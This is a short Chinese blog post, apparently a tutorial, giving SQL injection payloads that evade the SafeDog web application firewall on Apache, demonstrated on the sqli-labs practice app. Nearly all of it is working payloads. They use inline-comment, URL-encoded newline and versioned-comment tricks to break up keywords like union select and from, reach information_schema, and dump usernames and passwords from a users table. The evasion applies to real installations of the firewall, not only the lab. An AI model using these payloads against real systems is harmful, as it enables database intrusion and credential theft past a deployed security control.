sql注入绕过最新apache版安全狗(环境:phpstudy下sqllibs)

一、绕过组合语句匹配机制(如union select、order by)

        1./*/s*/

        2./*/a*/%23%0a

        用以上语句截断两个单词,如sqllib_less 1:

        id=1' order/*/a*/%23%0aby 3--+

二、绕过数据库的一些关键函数

        1./*!22222database%23%0a*//*/s*/()

        例 sqllib_less 1:

        id=-1' union/*/a*/%23%0aselect 1,/*!22222database%23%0a*//*/s*/(),3--+

三、绕过from关键字:

        1./*/s*/%23%0afrom

        例 sqllib_less 1:

        id=-1' union/*/a*/%23%0aselect 1,2,group_concat(username,password)/*/s*/%23%0afrom users--+

三、绕过information_schema:

        1./*!--+/*%0ainformation_schema./*!tables*/

        id=-1' union/*/a*/%23%0aselect 1,2,group_concat(table_name)/*/s*/from /*!--+/*%0ainformation_schema./*!tables*/where table_schema='security'--+

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值